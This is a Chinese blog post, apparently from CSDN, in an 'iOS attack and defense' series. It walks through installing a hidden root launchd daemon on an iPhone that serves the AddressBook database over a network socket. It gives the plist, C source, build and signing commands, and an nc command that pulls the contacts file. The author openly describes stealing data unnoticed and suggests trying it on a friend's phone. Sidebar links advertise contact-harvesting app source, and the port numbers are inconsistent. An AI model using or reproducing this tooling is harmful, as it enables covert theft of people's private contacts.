iOS 安全攻防系列(一):获取手机联系人

最新推荐文章于 2023-06-12 19:37:33 发布
最新推荐文章于 2023-06-12 19:37:33 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: iOS安全攻防 文章标签: ios iOS安全攻防 安全 获取iPhone手机联系人 获取联系人
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woaizijiheni/article/details/50265521
版权

上一篇我们编了一个HelloWorld程序,并且手动运行成功

但是我们写个程序不可能就去别人手机上打印一个HelloWorld吧。这篇就来介绍如何获取手机联系人。

要获取用户的手机联系人,总不能大摇大摆的在用户手机上运行一个app吧,那要如何在用户不知不觉的情况下获取到用户的手机联系人呢。这就需要用到守护进程。

守护进程是指在后台运行的程序,不直接由用户控制。对于攻击者来说将代码守护花的好处非常多。运行在后台的恶意代码可以偷偷的窃取数据,而不会被用户发觉。也可以连接到一台控制服务器等待指令。这种恶意代码感染方法的好处是。不需要用户启动一个应用软件或者执行其他任何任务就可以气动攻击。这不正是我们需要的么。

要在iOS的后台启动一个进程,那就要了解iOS的进程管理。

所有的iOS设备都通过Launchd 来启动或者停止服务。进程的管理方法取决于一个Launchd 的清单文件,后者定义了进程启动和停止的条件和方法。

# ls /System/Library/LaunchDaemons/

bootps.plist                          com.apple.mDNSResponder.plist

com.apple.CrashHousekeeping.plist     com.apple.mobile.softwareupdated.plist__

com.apple.MobileFileIntegrity.plist   com.apple.softwareupdateservicesd.plist__

com.apple.jetsamproperties.N94.plist 

然后我们自己来为自己的程序写一个清单文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/helloworld</string>
</array>
<key>Program</key>
<string>/usr/bin/helloworld</string>
<key>Label</key>
<string>com.yourdomain.helloworld</string>
<key>SessionCreate</key>
<true/>
<key>Sockets</key>
<dict>
<key>Listeners</key>
<dict>
<key>SocketServiceName</key>
<string>77</string>
</dict>
</dict>
<key>StandardErrorPath</key>
<string>/dev/null</string>
<key>inetdCompatibility</key>
<dict>
<key>Wait</key>
<false/>
</dict>
</dict>
</plist>


以上定义了HelloWorld 程序的Launchd 的清单文件。

然后将这个文件拷贝 到 /System/Library/LaunchDaemons/   目录下

# launchctl load /Library/LaunchDaemons/com.yourdomain.helloworld.plist 

/Library/LaunchDaemons/com.yourdomain.helloworld.plist: Operation already in progress

使用这个命令来启动它。 

$telnet 192.168.2.15 77 可以看看会有什么情况

当一个用户从端口7 连接的时候,清单文件的内容会作为root 用户来运行这个helloworld 程序 ,并将其输入输出重定向到连接的socket上,而不是标准输入输出。不过简单的打印一行helloworld 也太无聊了,哪有人把iOS设备黑掉就是为了说一句HelloWorld呢。你可以在你的朋友手机上试试。攻击者可不这么无聊。来看点实际用处。获取联系人。

#include <stdio.h>

#include <fcntl.h>

#include <stdlib.h>

#include <unistd.h>

#define FILE "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"

int main(){

    int fd = open(FILE, O_RDONLY);

    char buff[128];

    size_t nr;

    if (fd < 0) {

        exit(-1);

    }

    while ((nr = read(fd,buff,sizeof(buff))) > 0) {

        write(fileno(stdout),buff,nr);

    }

}


编译

$clang -arch armv7 -isysroot `xcrun --sdk iphoneos --show-sdk-path` -o helloworld helloworld.c

把二级制文件拷贝到/usr/bin/helloworld 中

签名

#ldid -S helloworld


$nc 192.168.2.15 8024 > AddressBook.sqlitedb

好了,拿个工具打开AddressBook.sqlitedb看看吧


再见依然
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
iOS开发系列视频教程:objective-C
07-23
资源名称:iOS开发系列视频教程:Objective-C   资源目录: 【】无限互联iOS开发视频教程-Objective-C部分(第一部分) 【】无限互联iOS开发视频教程-Objective-C部分(第七部分) 【】无限...
2023全网首发闪聊远程获取通讯录PHP源码 附安装教程
weixin_45892228的博客
05-09 1320
而电子商务网站要能够处理在线支付和订单管理,因此它们的源码可能会包含与支付处理和订单跟踪相关的代码。网络应用程序是一种可以通过网络浏览器访问的软件,它通常运行在服务器上,并使用 Web 技术(如 HTML、CSS 和 JavaScript)进行开发。它决定了应用程序的功能、性能和安全性,并为开发人员提供了创建出色网络应用程序所的工具。每种类型的网络应用程序都有其特定的求和功能,因此它们的源码也会有所不同。http://改为自己ip访问/admin/index/index.shtml。
2023 夜聊远程获取通讯录APP/相册/短信/双端源码
最新发布
06-12 1649
2023 夜聊远程获取通讯录APP/相册/短信/双端源码2023 夜聊远程获取通讯录APP/相册/短信/双端源码2023 夜聊远程获取通讯录APP/相册/短信/双端源码2023 夜聊远程获取通讯录APP/相册/短信/双端源码2023 夜聊远程获取通讯录APP/相册/短信/双端源码2023 夜聊远程获取通讯录APP/相册/短信/双端源码。http://改为自己ip访问/admin/默认账号 密码 admin 123456。宝塔站点伪静态设置为tphinkphp。请勿违法使用,仅供学习。PHP版本选择5.6。
奇思妙想,获取对方手机通信录
热门推荐
Nocker888的博客
10-02 1万+
奇思妙想,获取对方手机通信录 最近看了点文章,感觉自己飘了。(我活在自己的幻想里), 这次做个实验,来给大家介绍介绍一些灰黑产业的套路。代码粗糙,路子野。 首先来个背景,接着小明的故事来把。 起因,小明由于他的操作,惹了女神红生气,生气了怎么办,小明这个时候打算给小明买个小礼物,来个小惊喜,可是小明并不知道小红的手机号,这个时候我们的小明,辗转发侧,于是他向Arks7讯问怎么办可以快速弄到,小红的手机号,并且神不知鬼不觉,这个时候Arks7给他发了现在这篇文章,小明就知道怎么办了。 于是乎,小明学习了
Mac电脑如何设置DHCP
weixin_30737433的博客
08-18 963
通过设置MAC电脑的DHCP服务器可以为局域网内的其它设备自动分配IP地址,还能把物理地址和IP地址绑定起来,限制IP地址的获取。 OS X 10.11或以上版本已内置DHCP服务器软件,即bootpd。通过man bootpd命令即可查看这个命令的用法。 bootpd启动时可提供2种模式,即DHCP和bootp,但默认情况不开启DHCP而是开启...
安卓手机应用获取通讯录中的联系人
Watom_663的博客
05-23 2690
前语:由于安卓系统更新现在无法在真机上将联系人读取出来,此文章会后续修改第 1 步 了解读取联系人数据的原理a.手机存放联系人表格的路径: data/data/com.android.providers.contacts/databases/contacts2.db b.这个数据库中涉及3张表:raw_contacts、data、mimetypes,其中: raw_contacts:可以读
iOS应用安全攻防视频.txt
06-10
根据提供的文件信息,我们可以归纳出一系列与“iOS应用安全攻防”相关的知识点。这些知识点将基于标题、描述以及部分给出的内容进行展开。 ### iOS应用安全攻防概述 #### 一、iOS安全基础 1. **iOS系统架构简介**...
IOS获取本地通讯录联系人以及汉字首字母排序
01-05
iOS获取手机通讯录中的联系人信息: /*** 加载本地联系人*/ - (void)loadLocalContacts { //新建一个通讯录类 ABAddressBookRef addressBooks = nil; if (DeviceVersion < 6.0) { addressBooks = ...
iOS获取手机通讯录方式方法(最新)
01-21
最近学习了iOS获取手机通讯录方式方法,现在分享给大家。希望此文章对各位有所帮助。 一、iOS 9 以前的通讯录框架 AddressBookUI框架:提供了联系人列表界面、联系人详情界面、添加联系人界面等,一般用于选择联系...
iOS应用安全攻防
04-04
iOS 安全 攻防,英语好的直接撸就好了,英语不好的权当学英语了
获取通讯录
03-08
获取手机内的通讯录联系人
获取通讯录姓名和号码
02-03
获取通讯录姓名和号码
读取手机本地通讯录
08-20
读取手机本地通讯录(不能读取Sim卡)直接跳转到系统通讯录界面 点击选择 如果联系人有多个号码 点击之后弹出对话框选择号码
快速读取全部手机通讯录联系人
07-01
Android 快速读取全部手机通讯录联系人:特点速度快,方法全面,能满足大多数人求。 博客地址:https://blog.csdn.net/qq569699973
jetslammed:能够通过 iOS 调整过程调整 jetsam 内存限制
07-09
喷气式飞机 用于修改 iOS 进程(如 SpringBoard)jetsam 内存限制并管理/允许请求不同内存限制的多个调整的库。 jetslammed 会将内存限制设置为请求的最高限制。 在目标进程(即 SpringBoard)中,使用: jetslammed_updateWaterMark(350, "mytweakname"); 默认水印级别位于 /System/Library/LaunchDaemons/com.apple.jetsamproperties..plist 即, com.apple.SpringBoard 在 iOS 8 for iPhone6 上是 JetsamMemoryLimit=240 添加以下取决于您的控制文件(并链接到 libjetslammed.dylib 并使用包含的 jetslammed.h): 取决于:喷气式飞机
读取联系人
12-21
一个简易的联系人通讯集制作案例,让你学会内容提供者与Uri的使用原理。
获取手机通讯录的简单实现
牵手生活
07-14 5194
直接上代码: 在AndroidManifest.xml 中添加权限 xmlns:android="http://schemas.android.com/apk/res/android" package="com.palmv.getcontacts"> android:name="android.permission.READ_CONTACTS"/>
通过Uri获取手机通讯录的某个联系人
木头小颖的博客
08-17 1577
private String[] getPhoneContacts(Uri uri) { String[] contact = new String[2]; ContentResolver cr = getContentResolver(); Cursor cursor = cr.query(uri, null, null, null, null);
iOS安全攻防深度解析:Hook技术与实战
iOS移动开发中,安全攻防是不可或缺的重要一环。本资源主要涵盖了iOS安全领域的多个关键知识点,包括Hook原理、LLDB命令、Mach-O文件、dyld动态链接库、应用签名与重签名、代码注入以及密码学基础。以下是对这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值